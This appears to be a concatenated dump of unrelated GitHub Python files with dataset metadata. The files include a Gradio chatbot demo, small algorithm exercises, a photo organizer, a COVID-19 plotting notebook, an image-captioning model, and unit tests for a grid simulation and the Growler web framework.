len(turn[1])\n return sum\n\ndef get_bot_message(message, chat_history):\n context = {\"messages\": []}\n history = copy.deepcopy(chat_history)\n\n if len(message) > max_context_len:\n return None\n\n while (count_history_len(history) + len(message)) > max_context_len:\n history = history[1:]\n sys.update(value=f\"Context longer than {max_context_len} is ignored.\")\n\n for turn in chat_history:\n context[\"messages\"].append({\"role\": \"user\", \"content\": turn[0]})\n context[\"messages\"].append({\"role\": \"assistant\", \"content\": turn[1]})\n\n context[\"messages\"].append({\"role\": \"user\", \"content\": message})\n\n responses, scores = assistant.inference([context])\n bot_message = responses[0]\n\n return bot_message\n\ndef respond(message, chat_history, request: gr.Request):\n sys.update(value=welcome)\n bot_message = get_bot_message(message, chat_history)\n if bot_message is None:\n sys.update(value=f\"Your input message should no longer than {max_context_len}.\")\n return message, chat_history\n time.sleep(0.05)\n chat_history.append((message, bot_message))\n ip = str(request.client)\n now = datetime.now()\n record_time = now.strftime(\"%m-%d-%Y-%H-%M-%S\")\n output_path = os.path.join(\"gradio_chats\", ip + \".txt\")\n os.makedirs(os.path.dirname(output_path), exist_ok=True)\n with open(output_path, \"a\", encoding=\"utf-8\") as f:\n f.write(record_time+\"\\n\")\n f.write(\"用户: \" + message + \"\\n\")\n f.write(\"助手: \" + bot_message + \"\\n\")\n\n return \"\", chat_history\n\ndef start_new_line(message, chat_history):\n message += \"\\n\"\n return message, chat_history\n\n\n\nif __name__ == \"__main__\":\n parser = ArgumentParser()\n parser.add_argument(\n \"--model_name_or_path\", type=str, default=\"ChiyuSONG/data-efficient-training-of-LLMs-v1\"\n )\n args = parser.parse_args()\n\n with torch.no_grad():\n assistant = Assistant(args.model_name_or_path)\n tokenizer = assistant.tokenizer\n config = GenerationConfig(\n max_new_tokens=max_context_len // 2,\n min_length=1,\n do_sample=False,\n temperature=0.2,\n top_k=40,\n top_p=0.6,\n repetition_penalty=1.1,\n output_scores=True,\n return_dict_in_generate=True,\n pad_token_id=tokenizer.pad_token_id,\n eos_token_id=[tokenizer.bos_token_id, tokenizer.eos_token_id, tokenizer.unk_token_id,\n tokenizer.eot_token_id, tokenizer.user_token_id, tokenizer.assistant_token_id],\n )\n assistant.config = config\n assistant.set_model_identity(model_identity)\n\n with gr.Blocks() as demo:\n welcome = \"Welcome!\"\n sys = gr.Markdown(value=welcome)\n chatbot = gr.Chatbot()\n msg = gr.Textbox(placeholder=\"Press Shift+Enter to start a new line...\")\n sub = gr.Button(\"Submit\")\n clear = gr.ClearButton([msg, chatbot])\n\n sub.click(respond, [msg, chatbot], [msg, chatbot])\n msg.submit(start_new_line, [msg, chatbot], [msg, chatbot])\n\n demo.launch(share=True)\n","repo_name":"ChiyuSONG/data-efficient-training-of-LLMs","sub_path":"chat_gradio.py","file_name":"chat_gradio.py","file_ext":"py","file_size_in_byte":3647,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"78"} +{"seq_id":"8638261926","text":"n = int(input())\narr = sorted(list(map(int, input().split())))\n\nm = int(input())\narr2 = list(map(int, input().split()))\n\n\ndef binary_search(start, end, target):\n middle = (start + end) // 2\n while True:\n if arr[middle] < target:\n start = middle\n middle = (middle + end) // 2\n elif arr[middle] > target:\n end = middle\n middle = (start + middle) // 2\n # print(start, middle, end)\n if arr[middle] == target:\n return 1\n elif middle == start:\n return 0\n\n\nfor num in arr2:\n print(binary_search(0, len(arr), num))\n","repo_name":"yangwooseong/algorithm","sub_path":"boj/1920.py","file_name":"1920.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"3936523835","text":"import os\nimport PIL.Image\nimport shutil\nimport argparse\n\n# _pathname = \"D:\\Zdjecia\\\\test\"\n# _test_pathname = \"D:\\\\test\"\n\n\ndef make_magic(pathname):\n list_of_dates = []\n for file in os.listdir(pathname):\n path_of_file = os.path.join(pathname,file)\n if os.path.isdir(path_of_file):\n continue\n year = extract_year_from_file(path_of_file)\n if year is None:\n continue\n if year not in list_of_dates:\n list_of_dates.append(year)\n new_directory_path = os.path.join(pathname,str(year))\n if not os.path.exists(new_directory_path):\n os.mkdir(new_directory_path)\n print(f\"Created new directory: {new_directory_path}\")\n try:\n shutil.move(path_of_file, new_directory_path)\n except shutil.Error as e:\n print(str(e))\n\n\ndef extract_year_from_file(path):\n year = None\n try:\n img = PIL.Image.open(path)\n exif_data = img._getexif()\n date = exif_data[306]\n year = date[:date.find(\":\")]\n except Exception as e:\n print(e)\n return year\n\ndef create_menu():\n parser = argparse.ArgumentParser(description=\"How to use:\")\n parser.add_argument('-p','--path', type=str, help='Path to directory.', required=True)\n\n menu_args = parser.parse_args()\n\n return menu_args\n\ndef main():\n args = create_menu()\n\n if not os.path.exists(args.path):\n print(\"Directory doesn't exist. Ending program...\")\n return\n make_magic(args.path)\n\nif __name__ == '__main__':\n main()","repo_name":"Kankarollo/PhotoOrganizer","sub_path":"photo_manager.py","file_name":"photo_manager.py","file_ext":"py","file_size_in_byte":1572,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"12809717420","text":"\"\"\"\nCheck if the bot is able to login into user account\n\"\"\"\n\nfrom insta_ops import InstaOps\nimport multiprocessing as mp\nimport pandas as pd\n\ndef worker(hash_tag):\n instance = InstaOps(True, True, True, True)\n if instance._bool_check_tag(hash_tag):\n return hash_tag\n\ntags_df = pd.read_excel('insta_config.xlsx', sheet_name='hashtags')\ntags = list(tags_df.hashtags)\n\nprint(\"Checking for working hash_tags from insta_config\")\nprint(\"Commencing HAVOC, please close other applications...\")\nif __name__ == '__main__':\n p = mp.Pool(mp.cpu_count())\n working_hashtags=(p.map(worker, tags))\n _ = pd.DataFrame(working_hashtags, columns=[\"hashtags\"])\n _.to_csv(\"working_hashtags.csv\",index=False)\n print('Created \"working_hashtags.csv\"')\n\n\nprint(\"Checking user login\")\nbot = InstaOps(False)\nbot.account_init()\n","repo_name":"Aqua-4/auto-insta","sub_path":"chk_setup.py","file_name":"chk_setup.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"71050106491","text":"# This Python 3 environment comes with many helpful analytics libraries installed\n# It is defined by the kaggle/python docker image: https://github.com/kaggle/docker-python\n# For example, here's several helpful packages to load in \n\nimport numpy as np # linear algebra\nimport pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)\n\n# Input data files are available in the \"../input/\" directory.\n# For example, running this (by clicking run or pressing Shift+Enter) will list all files under the input directory\n\nimport os\nfor dirname, _, filenames in os.walk('/kaggle/input'):\n for filename in filenames:\n print(os.path.join(dirname, filename))\n\n# Any results you write to the current directory are saved as output.\ntrain = pd.read_csv('/kaggle/input/covid19-global-forecasting-week-4/train.csv')\ntest = pd.read_csv('/kaggle/input/covid19-global-forecasting-week-4/test.csv')\ntrain.head()\ntrain.describe()\ntrain.info()\ntrain['Date'] = pd.to_datetime(train['Date'])\ntest['Date'] = pd.to_datetime(test['Date'])\ntrain.isnull().sum()\ntrain['Province_State'].fillna(' ',inplace=True)\ntrain.head()\nimport plotly_express as px\n# last date\nlast_date = train.Date.max()\nlast_date\n# Countries with the most cases till last date\ncountries = train[train['Date']==last_date]\ncountries = countries.groupby('Country_Region', as_index=False)['ConfirmedCases','Fatalities'].sum()\ncountries = countries.nlargest(10,'ConfirmedCases')\ncountries.head()\n# Trend for top 10\ncase_trend = train.groupby(['Date','Country_Region'], as_index=False)['ConfirmedCases','Fatalities'].sum()\ncase_trend = case_trend.merge(countries, on='Country_Region')\ncase_trend.drop(['ConfirmedCases_y','Fatalities_y'],axis=1, inplace=True)\ncase_trend.rename(columns={'Country_Region':'Country', 'ConfirmedCases_x':'Cases', 'Fatalities_x':'Deaths'}, inplace=True)\n\ncase_trend.head()\npx.line(case_trend, x='Date', y='Cases', color='Country', title='COVID19 Total Cases growth for top 10 worst affected countries')\npx.line(case_trend, x='Date', y='Deaths', color='Country', title='COVID19 Total Deaths growth for top 10 worst affected countries')\n#Add columns for studying logarithmic trends\ncase_trend['ln(Cases)'] = np.log(case_trend['Cases']+1)# Added 1 to remove error due to log(0).\ncase_trend['ln(Deaths)'] = np.log(case_trend['Deaths']+1)\npx.line(case_trend, x='Date', y='ln(Cases)', color='Country', title='COVID19 Total Cases growth for top 10 worst affected countries(Logarithmic Scale)')\npx.line(case_trend, x='Date', y='ln(Deaths)', color='Country', title='COVID19 Total Deaths growth for top 10 worst affected countries(Logarithmic Scale)')\n# Mortality Rate\ncase_trend['Mortality Rate%'] = round((case_trend.Deaths/case_trend.Cases)*100,2)\npx.line(case_trend, x='Date', y='Mortality Rate%', color='Country', title='Variation of Mortality Rate% \\n(Top 10 worst affected countries)')\ndf_usa = train.query(\"Country_Region=='US'\")\nUS_cases = df_usa.groupby('Date',as_index=False)['ConfirmedCases','Fatalities'].sum()\nUS_cases.head()\npx.bar(US_cases, x='Date', y='ConfirmedCases')\nimport plotly.graph_objects as go\nfig = go.Figure(data=[\n go.Bar(name='Cases', x=US_cases['Date'], y=US_cases['ConfirmedCases']),\n go.Bar(name='Deaths', x=US_cases['Date'], y=US_cases['Fatalities'])\n])\n# Change the bar mode\nfig.update_layout(barmode='overlay', title='Daily Case and Death count(USA)')\nfig.show()\ndf_India = train.query(\"Country_Region=='India'\")\nIndia_cases = df_India.groupby('Date',as_index=False)['ConfirmedCases','Fatalities'].sum()\ndef add_daily_measures(df):\n df.loc[0,'Daily Cases'] = df.loc[0,'ConfirmedCases']\n df.loc[0,'Daily Deaths'] = df.loc[0,'Fatalities']\n for i in range(1,len(df)):\n df.loc[i,'Daily Cases'] = df.loc[i,'ConfirmedCases'] - df.loc[i-1,'ConfirmedCases']\n df.loc[i,'Daily Deaths'] = df.loc[i,'Fatalities'] - df.loc[i-1,'Fatalities']\n #Make the first row as 0 because we don't know the previous value\n df.loc[0,'Daily Cases'] = 0\n df.loc[0,'Daily Deaths'] = 0\n return df\nIndia_cases = add_daily_measures(India_cases)\nIndia_cases.head()\nfig = go.Figure(data=[\n go.Bar(name='Cases', x=India_cases['Date'], y=India_cases['Daily Cases']),\n go.Bar(name='Deaths', x=India_cases['Date'], y=India_cases['Daily Deaths'])\n])\n# Change the bar mode\nfig.update_layout(barmode='overlay', title='Daily Case and Death count(India)')\nfig.show()\n# Give Lockdown Notation\nfig.update_layout(barmode='overlay', title='Daily Case and Death count(India)',\n annotations=[dict(x='2020-03-23', y=106, xref=\"x\", yref=\"y\", text=\"Lockdown Imposed(23rd March)\", showarrow=True, arrowhead=1, ax=-100, ay=-100)])\nfig.show()\ndf_Italy = train.query(\"Country_Region=='Italy'\")\nItaly_cases = df_Italy.groupby('Date',as_index=False)['ConfirmedCases','Fatalities'].sum()\nItaly_cases = add_daily_measures(Italy_cases)\nfig = go.Figure(data=[\n go.Bar(name='Cases', x=Italy_cases['Date'], y=Italy_cases['Daily Cases']),\n go.Bar(name='Deaths', x=Italy_cases['Date'], y=Italy_cases['Daily Deaths'])\n])\n# Give Lockdown Notation\nfig.update_layout(barmode='overlay', title='Daily Case and Death count(Italy)',\n annotations=[dict(x='2020-03-09', y=1797, xref=\"x\", yref=\"y\", text=\"Lockdown Imposed(9th March)\", showarrow=True, arrowhead=1, ax=-100, ay=-100)])\nfig.show()\n#Spain\ndf_Spain = train.query(\"Country_Region=='Spain'\")\nSpain_cases = df_Spain.groupby('Date',as_index=False)['ConfirmedCases','Fatalities'].sum()\nSpain_cases = add_daily_measures(Spain_cases)\nfig = go.Figure(data=[\n go.Bar(name='Cases', x=Spain_cases['Date'], y=Spain_cases['Daily Cases']),\n go.Bar(name='Deaths', x=Spain_cases['Date'], y=Spain_cases['Daily Deaths'])\n])\n# Give Lockdown Notation\nfig.update_layout(barmode='overlay', title='Daily Case and Death count(Spain)',\n annotations=[dict(x='2020-03-15', y=1797, xref=\"x\", yref=\"y\", text=\"Lockdown Imposed(15th March)\", showarrow=True, arrowhead=1, ax=-100, ay=-100)])\nfig.show()\nSpain_cases.head()\nimport seaborn as sns\ncases = train.groupby('Country_Region')['ConfirmedCases'].sum().reset_index()\ncases.head()\nfig = px.pie(cases, values='ConfirmedCases', names='Country_Region')\nfig.show()\nfig = px.line(Spain_cases, x='Date', y='ConfirmedCases')\nfig.show()\ndf_China = train.query(\"Country_Region=='China'\")\nChina_cases = df_China.groupby('Date',as_index=False)['ConfirmedCases','Fatalities'].sum()\nfig = px.line(China_cases, x='Date', y='ConfirmedCases')\nfig.update_xaxes(rangeslider_visible=True)\nfig.show()\n\nfig = px.line(India_cases, x='Date', y='ConfirmedCases')\nfig.update_xaxes(rangeslider_visible=True)\nfig.show()\nfig = px.line(US_cases, x='Date', y='ConfirmedCases')\nfig.update_xaxes(rangeslider_visible=True)\nfig.show()","repo_name":"aorursy/new-nb-1","sub_path":"ashish2070_coronavirus-through-visualization.py","file_name":"ashish2070_coronavirus-through-visualization.py","file_ext":"py","file_size_in_byte":6721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"22700497850","text":"import sys\nsys.path.insert(1, '../src')\nimport unittest\nimport grid\nimport entity\n\nclass Entity_test(unittest.TestCase):\n\n def test_get_position(self):\n g = grid.Grid(10,5,[],0)\n x = 3\n y = 3\n ent = entity.Entity(g)\n g.place_entity(x, y, ent)\n return ent.get_position() == (x,y)\n\n def test_add_weight(self):\n g = grid.Grid(10,5,[],0)\n ent = entity.Entity(g)\n ent.add_weight(3)\n return ent.get_weight() == 4\n\n def test_get_weight(self):\n g = grid.Grid(10,5,[],0)\n ent = entity.Entity(g)\n nent = entity.Entity(g, weight=8)\n return (ent.get_weight(), nent.get_weight()) == (1,8)\n\n def test_is_passive(self):\n g = grid.Grid(10,5,[],0)\n ent = entity.Entity(g)\n return ent.is_passive()\n\n def test_is_active(self):\n g = grid.Grid(10,5,[],0)\n ent = entity.Entity(g)\n return ent.is_active()\n\n def test_is_agent(self):\n g = grid.Grid(10,5,[],0)\n ent = entity.Entity(g)\n return not ent.is_agent()\n\n def test_is_box(self):\n g = grid.Grid(10,5,[],0)\n ent = entity.Entity(g)\n return not ent.is_box()\n\n def test_is_plateform(self):\n g = grid.Grid(10,5,[],0)\n ent = entity.Entity(g)\n return not ent.is_platform()\n\n def test_is_active(self):\n g = grid.Grid(10,5,[],0)\n ent = entity.Entity(g)\n return not ent.is_active()\n\n def test_get_cell(self):\n g = grid.Grid(10,5,[],0)\n ent = entity.Entity(g)\n cell = grid.Grid_cells(0, 0)\n ent.set_cell(cell)\n return ent.get_cell() == cell\n\n def test_distance_to(self):\n g = grid.Grid(10,5,[],0)\n x = 3\n y = 3\n ent = entity.Entity(g)\n g.place_entity(x, y, ent)\n nent = entity.Entity(g)\n g.place_entity(x+2, y-1, nent)\n return ent.distance_to(nent) == 3\n\n def test_is_adjacente_true(self):\n g = grid.Grid(10,5,[],0)\n x = 3\n y = 3\n ent = entity.Entity(g)\n g.place_entity(x, y, ent)\n nent = entity.Entity(g)\n g.place_entity(x, y-1, nent)\n return ent.is_adjacent(nent)\n\n def test_is_adjacente_false(self):\n g = grid.Grid(10,5,[],0)\n x = 3\n y = 3\n ent = entity.Entity(g)\n g.place_entity(x, y, ent)\n nent = entity.Entity(g)\n g.place_entity(x+1, y-1, nent)\n return not ent.is_adjacent(nent)\n\nclass ActiveEntity_test(unittest.TestCase):\n\n def test_is_active(self):\n g = grid.Grid(10,5,[],0)\n ent = entity.ActiveEntity(g)\n return ent.is_active()\n\n\n","repo_name":"lesueur-philippe/SMA","sub_path":"Projet/test/test_entity.py","file_name":"test_entity.py","file_ext":"py","file_size_in_byte":2650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"27465924178","text":"from array import *\r\n\r\n\r\ndef findduplicate(arr):\r\n for i in range(len(arr)):\r\n for j in range(i + 1, len(arr)):\r\n if arr[i] == arr[j]:\r\n print(arr[i])\r\n # or\r\n \"\"\" Let say nums[ 1, 3, 2, 3 ]\r\n while nums[0] != nums[nums[0]]: # i.e nums[0] (1) != nums[nums[0]] (nums[1] = 3), the index 0 will keep changing\r\n nums[nums[0]], nums[0] = nums[0], nums[nums[0]] # so swap, we get nums[ 3, 1, 2, 3 ] nums[0] = 3 and nums[1] = 1\r\n return nums[0] # now, nums[0] (3) == nums[nums[0]] (nums[3] = 3)\r\n \"\"\"\r\n\r\n\r\narr = []\r\nn = int(input(\"Enter number of elements: \"))\r\nfor i in range(n + 1):\r\n x = int(input('Enter array elements: '))\r\n arr.append(x)\r\nprint(arr)\r\nfindduplicate(arr)\r\n","repo_name":"danishkhanbx/Everything-in-Python","sub_path":"Example/Find Duplicate Number.py","file_name":"Find Duplicate Number.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"78"} +{"seq_id":"39513791266","text":"\ndef get_first_and_last_data_of_DF(df):\n\n earliestDate = df.iloc[0]['Date'].split('-')\n startYear = earliestDate[0]\n startMonth = earliestDate[1]\n startDays = earliestDate[2]\n \n latestDate = df.iloc[-1]['Date'].split('-')\n endingYear = latestDate[0]\n endingMonth = latestDate[1]\n endingDays = latestDate[2]\n\n return startYear, startMonth, startDays, endingYear, endingMonth, endingDays\n","repo_name":"Rperez1988/abcd_script","sub_path":"trading_bot/cerebro/data_manipulation/first_and_last_date_of_DF.py","file_name":"first_and_last_date_of_DF.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"811346459","text":"################################################################################\n# CSE 253: Programming Assignment 4\n# Code snippet by Ajit Kumar, Savyasachi\n# Fall 2020\n# Finely implemented and refined by Colin Wang, Jerry Chan\n################################################################################\n\nimport torch.nn as nn\nimport torch\nimport torchvision.models as models\nimport numpy as np\nfrom torch.nn.utils.rnn import pack_padded_sequence\n\n# Build and return the model here based on the configuration.\ndef get_model(config_data):\n hidden_size = config_data['model']['hidden_size']\n embedding_size = config_data['model']['embedding_size']\n model_type = config_data['model']['model_type']\n if config_data['model']['device'] == 'cuda':\n return baseline(config_data).cuda()\n return baseline(config_data)\n \nclass baseline(nn.Module):\n def __init__(self, config_data):\n super(baseline, self).__init__()\n self.config = config_data['model']\n self.model_type = config_data['model']['model_type']\n\n # encoder\n resnet = models.resnet50(pretrained = True)\n pretrain_outshape = resnet.fc.in_features\n self.resnet = nn.Sequential(*list(resnet.children())[:-1])\n self.linear = nn.Linear(pretrain_outshape, \n \t\t\t\t\t\tself.config['embedding_size'])\n self.bn = nn.BatchNorm1d(self.config['embedding_size'], momentum=0.01)\n\n # decoder\n self.embedding = nn.Embedding(self.config['vocab_size'], \n \t\t\t\t\t\t\t self.config['embedding_size'])\n if self.model_type == 'baseline':\n self.rnn = nn.LSTM(input_size = self.config['embedding_size'],\n hidden_size = self.config['hidden_size'], \n batch_first=True)\n if self.model_type == 'arch2':\n self.rnn = nn.LSTM(input_size = self.config['embedding_size'] * 2,\n hidden_size = self.config['hidden_size'], \n batch_first=True)\n if self.model_type == 'rnn':\n self.rnn = nn.RNN(input_size = self.config['embedding_size'],\n hidden_size = self.config['hidden_size'], \n batch_first=True)\n self.fc = nn.Linear(self.config['hidden_size'], \n \t\t\t\t\tself.config['vocab_size'])\n\n # freeze the encoder parameters if not fine-tune\n if not self.config['finetune']:\n self.freeze() \n \n def forward(self, images, captions):\n \t# getting image feature vectors\n features = self.resnet(images)\n features = features.reshape(features.size(0), -1)\n features = self.bn(self.linear(features))\n\n # embed/concatenate image feature vectors with caption embeddings\n if self.model_type == 'arch2':\n captions = torch.cat([torch.zeros((captions.shape[0],1), \n \t\t\t\t\t device = 'cuda', \n \t\t\t\t\t dtype = torch.long), \n captions[:,:-1]],1)\n embed = self.embedding(captions) # batch_size, seq_len, embed_size\n if self.model_type == 'baseline' or self.model_type == 'rnn':\n embed = torch.cat((features.unsqueeze(1), embed), dim = 1)\n lengths = [len(cap) for cap in captions]\n if self.model_type == 'arch2':\n features = features.view([features.shape[0], 1, -1])\\\n \t\t\t\t .repeat((1,captions.shape[1] ,1))\n embed = torch.cat([features, embed],2)\n\n # pack sequential embeddings and send to rnn\n # getting results with a linear layer\n embed = pack_padded_sequence(embed, lengths, batch_first=True)\n rnn_outputs, _ = self.rnn(embed)\n out = self.fc(rnn_outputs[0])\n return out\n\n def sample(self, images, max_length, mode, temperature, device):\n \t# initialize variables\n softmax = nn.Softmax(dim=1)\n sampled_ids = []\n\n # getting image feature vectors\n with torch.no_grad():\n features = self.resnet(images)\n features = features.reshape(features.size(0), -1)\n features = self.bn(self.linear(features)).unsqueeze(1)\n inputs = features\n\n # create initial paddings if model is arch2\n if self.model_type == 'arch2':\n image_features = inputs.clone()\n inputs = self.embedding(torch.zeros((images.shape[0],1),\n \t\t\t\t\t\tdevice = 'cuda', \n \t\t\t\t\t\tdtype = torch.long))\n states = None\n\n # generate captions word by word\n for i in range(max_length):\n if self.model_type == 'arch2':\n inputs = torch.cat([image_features, inputs], 2)\n rnn_outputs, states = self.rnn(inputs, states) \n rnn_outputs = rnn_outputs.squeeze(1) \n out = self.fc(rnn_outputs)\n caption_idx = self.generate_idx(mode, \n \tout, softmax, temperature, device)\n sampled_ids.append(caption_idx)\n inputs = self.embedding(caption_idx).unsqueeze(1)\n\n # integrate\n sampled_ids = torch.stack(sampled_ids, 1)\n return sampled_ids\n\n def generate_idx(self, mode, out, softmax, temperature, device):\n \t# determinstic mode, where we use greedy search algorithm\n if mode == 'deterministic':\n _, caption_idx = out.max(1)\n\n # stochastic mode, where we soften the distribution by a factor, \n # and then sampling from this distribution with softmax\n elif mode == 'stochastic':\n soft_out = softmax(out/temperature)\n p = soft_out.data.cpu().numpy()\n caption_idx = [np.random.choice(p.shape[1], p=p[j]) \\\n \t\t\t\tfor j in range(p.shape[0])]\n caption_idx = torch.tensor(caption_idx, dtype=torch.long)\n if device == 'cuda':\n caption_idx = caption_idx.cuda()\n else:\n raise Exception('Failed to recognize generation mode')\n return caption_idx\n \n def freeze(self):\n \t# freeze all parameters in resnet \n \t# (except for the last layer that is not included in the resnet model)\n for param in self.resnet.parameters():\n param.requires_grad_(False)\n","repo_name":"JerryYC/Intro-to-Deep-Learning-Projects","sub_path":"Image Captioning/code/model_factory.py","file_name":"model_factory.py","file_ext":"py","file_size_in_byte":6215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"32171864051","text":"from django import template\n\n\nregister = template.Library()\n\n@register.inclusion_tag('blogs/pager.html')\ndef pager(page, page_view=2):\n page_num = page.number\n paginator = page.paginator\n\n pages_list = [x for x in range(page_num - page_view, page_num + page_view + 1) if x >= 1 and x <= paginator.num_pages]\n if pages_list[0] != 1:\n pages_list.insert(0, 1)\n\n if pages_list[-1] != paginator.num_pages:\n pages_list.append(paginator.num_pages)\n\n if len(pages_list) >= 2:\n if pages_list[1] >= 3:\n pages_list.insert(1, '...')\n\n if pages_list[-2] < paginator.num_pages - 1:\n pages_list.insert(-1, '...')\n\n return {\n 'page_current': page,\n 'pages_list': pages_list,\n }\n\n\n@register.simple_tag\ndef arithmetic(operation_string, *args, **kwargs):\n if not args:\n val = eval(operation_string)\n else:\n val = eval(operation_string % args)\n\n if 'change_int' in kwargs:\n if kwargs['change_int']:\n return int(val)\n\n return val","repo_name":"himluo/myblog","sub_path":"blogs/templatetags/tags.py","file_name":"tags.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"16145578352","text":"#\n# test_app\n#\n\nimport re\nimport sys\nimport types\nimport pytest\nfrom asyncio.coroutines import iscoroutine\n\nfrom mocks import * # noqa\nfrom unittest import mock\nfrom growler import growler, Application, GrowlerStopIteration\n\n\nfrom mock_classes import (\n MockRequest,\n MockResponse,\n MockProtocolHttp,\n)\n\nres = mock_res\n\n@pytest.fixture\ndef app_name():\n return 'GrowlerApplication'\n\n\n@pytest.fixture\ndef mock_MiddlewareChain():\n return mock.create_autospec(growler.MiddlewareChain)\n\n\n@pytest.fixture\ndef use_mock_middlewarechain():\n return False\n\n@pytest.fixture\ndef proto():\n proto = mock.create_autospec(growler.http.GrowlerHTTPProtocol)\n return proto\n\n\n@pytest.fixture\ndef req_uri():\n return '/'\n\n\n@pytest.fixture\ndef req(req_uri):\n return mock.Mock(spec=growler.http.HTTPRequest,\n path=req_uri,\n method=0x01)\n\n\n@pytest.fixture\ndef app(app_name, mock_MiddlewareChain, use_mock_middlewarechain, MockProtocolHttp):\n\n mw_chain = mock_MiddlewareChain if use_mock_middlewarechain else None\n result = Application(app_name,\n request_class=MockRequest,\n response_class=MockResponse,\n middleware_chain=mw_chain)\n return result\n\n\n@pytest.fixture\ndef app_with_router(app, mock_router):\n app.middleware.add(growler.http.methods.HTTPMethod.ALL, '/', mock_router)\n return app\n\n\ndef test_application_constructor():\n app = growler.Application('Test')\n assert app.name == 'Test'\n\n\ndef test_application_constructor_alternate_middleware_type():\n app = growler.Application('Test', middleware_chain=list)\n assert app.middleware == []\n\n\n@pytest.mark.parametrize(\"use_mock_middlewarechain\", [True])\ndef test_app_fixture(app, app_name, mock_MiddlewareChain, MockProtocolHttp):\n assert isinstance(app, growler.Application)\n assert app.middleware is mock_MiddlewareChain\n assert app._request_class is MockRequest\n assert app._response_class is MockResponse\n\n\ndef test_application_saves_config():\n val = 'B'\n app = growler.Application('Test', A=val)\n assert app.config['A'] is val\n\n\ndef test_application_enables_x_powered_by(app):\n \"\"\" Test application enables x-powered-by by default \"\"\"\n assert app.enabled('x-powered-by')\n\n\ndef test_all(app_with_router, mock_router):\n m = mock.Mock()\n app_with_router.all('/', m)\n mock_router.all.assert_called_with('/', m)\n\n\ndef test_get(app_with_router, mock_router):\n m = mock.Mock()\n app_with_router.get('/', m)\n mock_router.get.assert_called_with('/', m)\n\n\ndef test_post(app_with_router, mock_router):\n m = mock.Mock()\n app_with_router.post('/', m)\n mock_router.post.assert_called_with('/', m)\n\n\ndef test_put(app_with_router, mock_router):\n m = mock.Mock()\n app_with_router.put('/', m)\n mock_router.put.assert_called_with('/', m)\n\n\ndef test_delete(app_with_router, mock_router):\n m = mock.Mock()\n app_with_router.delete('/', m)\n mock_router.delete.assert_called_with('/', m)\n\n\ndef test_use_function(app, mock_route_generator):\n m = mock_route_generator()\n app.use(m)\n assert app.middleware.last().func is m\n\n\ndef test_use_tuple(app, mock_route_generator):\n mws = tuple(mock_route_generator() for i in range(3))\n app.use(mws)\n assert len(mws) is len(app.middleware.mw_list)\n assert all((a.func is b for a, b in zip(app.middleware.mw_list, mws)))\n\n\ndef test_use_list(app, mock_route_generator):\n mw_list = [mock_route_generator() for i in range(3)]\n app.use(mw_list)\n assert len(mw_list) is len(app.middleware.mw_list)\n assert all((a.func is b for a, b in zip(app.middleware.mw_list, mw_list)))\n\n\ndef test_use_growler_router(app, mock_route_generator):\n m = mock.Mock()\n route = mock_route_generator()\n m.__growler_router = route\n app.use(m)\n assert app.middleware.last().func is route\n\n\ndef test_use_growler_router_factory(app, mock_route_generator):\n router = mock_route_generator()\n m = mock.Mock()\n m.__growler_router = mock.Mock(spec=types.MethodType,\n return_value=router)\n app.use(m)\n assert m.__growler_router.called\n assert app.middleware.last().func is router\n\n\ndef test_use_as_decorator(app):\n\n @app.use\n def test_mw(req, res):\n pass\n\n assert test_mw is not app\n assert app.middleware.last().func is test_mw\n assert app.middleware.last().path is growler.MiddlewareChain.ROOT_PATTERN\n\n\ndef test_use_as_called_decorator(app):\n\n @app.use(path='/foo')\n def test_mw(req, res):\n pass\n\n assert test_mw is not app\n assert app.middleware.last().func is test_mw\n assert app.middleware.last().path == re.compile(re.escape('/foo'))\n\n\ndef test_add_bad_router(app):\n # TODO: Implement real check for mock_router type\n app.strict_router_check = True\n with pytest.raises(TypeError):\n app.add_router(\"/foo\", lambda req, res: res.send_text(\"bad type!\"))\n\n\ndef test_ignore_add_bad_router(app):\n app.strict_router_check = False\n app.add_router(\"/foo\", lambda req, res: res.send_text(\"bad type!\"))\n\n\ndef test_use_growler_router_metaclass(app, mock_route_generator):\n\n class TestMeta(metaclass=growler.RouterMeta):\n\n def get_z(self, req, res): '''/'''\n def get_a(self, req, res): '''/a/a'''\n def get_b(self, req, res): '''/a/b'''\n\n mrouter = TestMeta()\n app.use(mrouter)\n router = app.middleware.mw_list[0].func\n\n assert isinstance(router, growler.Router)\n assert mrouter.get_z == router.mw_list[0].func\n assert mrouter.get_a == router.mw_list[1].func\n assert mrouter.get_b == router.mw_list[2].func\n\n\ndef test_create_server_return_server(app, event_loop, unused_tcp_port):\n \"\"\" Test if the application creates a server coroutine \"\"\"\n from asyncio.base_events import Server\n proto_factory = mock.Mock()\n server_cfg = dict(host='localhost', port=unused_tcp_port)\n\n server = app.create_server(proto_factory,\n loop=event_loop,\n as_coroutine=False,\n **server_cfg)\n\n assert isinstance(server, Server)\n if hasattr(server, '_protocol_factory'):\n assert server._protocol_factory is proto_factory.return_value\n\n\n@pytest.mark.asyncio\nasync def test_create_server_return_coroutine(app, event_loop, unused_tcp_port):\n from unittest.mock import MagicMock\n from asyncio.base_events import Server\n \"\"\" Test if the application creates a server coroutine \"\"\"\n proto_factory = mock.Mock()\n server_config = dict(host='127.1', port=unused_tcp_port)\n server_coroutine = app.create_server(proto_factory,\n as_coroutine=True,\n **server_config)\n\n assert iscoroutine(server_coroutine)\n server = await server_coroutine\n assert isinstance(server, Server)\n if hasattr(server, '_protocol_factory'):\n assert server._protocol_factory is proto_factory.return_value\n 